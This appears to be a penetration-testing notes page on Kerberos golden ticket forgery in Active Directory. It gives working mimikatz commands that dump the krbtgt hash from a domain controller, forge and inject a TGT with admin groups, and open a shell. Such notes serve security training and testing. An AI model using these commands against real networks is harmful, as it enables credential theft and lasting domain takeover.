Golden Ticket Forgery

Similar but more powerful than silver ticket forgery. This time we will forge a TGT by using the krbtgt password hash. We can create a TGT for any user with any groups! Even if not actually real in AD database, the TGT will trump that, as long as its valid the KDC will accept it.

First, on the DC, we must dump the hash of krbtgt. With mimikatz but it slightly differs:

> privilege::debug
> lsadump::lsa /patch

lsadump::lsa /patch Targets the LSA Secrets and cached credentials.

Now from any domain joined machine (or not) we can launch mimikatz, create a TGT and inject it in our session. We need the SID (check how we did for silver tickets).

> kerberos::purge
> kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt

The tgt created has for user the local admin of the DC and a bunch of powerful groups.Now that the tgt is injected, with start a cmd from mimikatz:

misc::cmd

Previous5 - Persistence NextShadow copies

Last updated 2 years ago